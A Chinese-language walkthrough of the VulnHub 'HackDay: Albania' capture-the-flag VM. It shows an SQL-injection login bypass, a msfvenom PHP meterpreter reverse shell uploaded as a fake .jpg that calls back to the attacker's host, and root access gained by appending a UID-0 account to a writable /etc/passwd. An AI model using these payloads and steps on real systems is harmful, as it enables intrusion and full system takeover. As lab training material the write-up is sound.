HackDay: Albania
References
- https://www.vulnhub.com/entry/hackday-albania,167/
- http://www.hackingarticles.in/hack-hackday-albania-vm-ctf-challenge/
- https://hackinguyz.blogspot.tw/2016/12/ctf-hackday-albania-walkthrough.html
重點摘要
- 用python爬大量url,看是否有不一樣的內容,記得把newline消除掉
- 找可寫入檔案
- 自創linux root權限帳密並寫入/etc/passwd
Writeup
- web: http://192.168.1.103:8008
robots.txt: 192.168.1.103:8008/robots.txt,一堆可疑連結
... Disallow: /atoydiajqwpejc/ Disallow: /bupzejbkrxqfkd/ Disallow: /cvqafkclsyrgle/ Disallow: /unisxcudkqjydw/ Disallow: /dwrbgldmtzshmf/ Disallow: /exschmenuating/ Disallow: /fytdinfovbujoh/ Disallow: /gzuejogpwcvkpi/ ...寫個python爬看看
import requests with open('urllist.txt') as f: for line in f: url = "http://192.168.1.103:8008"+line.rstrip() r = requests.head(url) print line.rstrip() + "=" + r.headers['content-length']結果發現/unisxcudkqjydw/頁面size與其它不同
/cvqafkclsyrgle/=150 /unisxcudkqjydw/=37 /dwrbgldmtzshmf/=150IS there any /vulnbank/ in there ???
發現登入頁面:http://192.168.1.103:8008/unisxcudkqjydw/vulnbank/client/login.php
單引號一插,跳出error msg
Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102bypass登入payload:
' or 'a' = 'a' #
有上傳頁面,上傳個webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f raw- 將產生的payload內容從
<?php複製到最後,並在最後加上?> - 重新命名為
webshell.jpg
開啟metasploit執行handler
msf > use exploit/multi/handler msf exploit(handler) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.102 lhost => 192.168.1.102 msf exploit(handler) > set lport 4444 lport => 4444 msf exploit(handler) > run [*] Started reverse TCP handler on 192.168.1.102:4444 [*] Starting the payload handler...點擊http://192.168.1.103:8008/unisxcudkqjydw/vulnbank/client/view_ticket.php?id=1
- 取得shell,spawn a tty:
meterpreter > shell Process 6865 created. Channel 0 created. python3 -c 'import pty; pty.spawn("/bin/bash");' www-data@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client$
- 取得shell,spawn a tty:
尋找可寫入檔案:
find / -writable -type f 2>/dev/null- 發現/etc/passwd是可寫入的
-rw-r--rw- 1 root root 2026 Dec 10 07:04 /etc/passwd
自行建立一組帳密,並append至/etc/passwd檔
產生密碼:
openssl passwd -1,並設定密碼為kaliroot@kali:~# openssl passwd -1 Password: Verifying - Password: $1$f/YvLJt0$PCa0AWxixTBMcKWY1xn0v0openssl是使用
md5,若要用sha256,則用python來產:python -c "import crypt; print crypt.crypt('KALI')"新創帳號
kali:(root權限:UID和GID設為0)kali:$1$f/YvLJt0$PCa0AWxixTBMcKWY1xn0v0:0:0:test:/root:/bin/bashappend至/etc/passwd檔:
echo 'kali:$1$f/YvLJt0$PCa0AWxixTBMcKWY1xn0v0:0:0:test:/root:/bin/bash' >> /etc/passwd
切換使用者
kali,即取得root權限www-data@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client$ su kali su kali Password: kali root@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client# id id uid=0(root) gid=0(root) groups=0(root)取得flag
root@hackday:~# ls ls flag.txt root@hackday:~# cat flag.txt cat flag.txt Urime, Tani nis raportin! d5ed38fdbf28bc4e58be142cf5a17cf5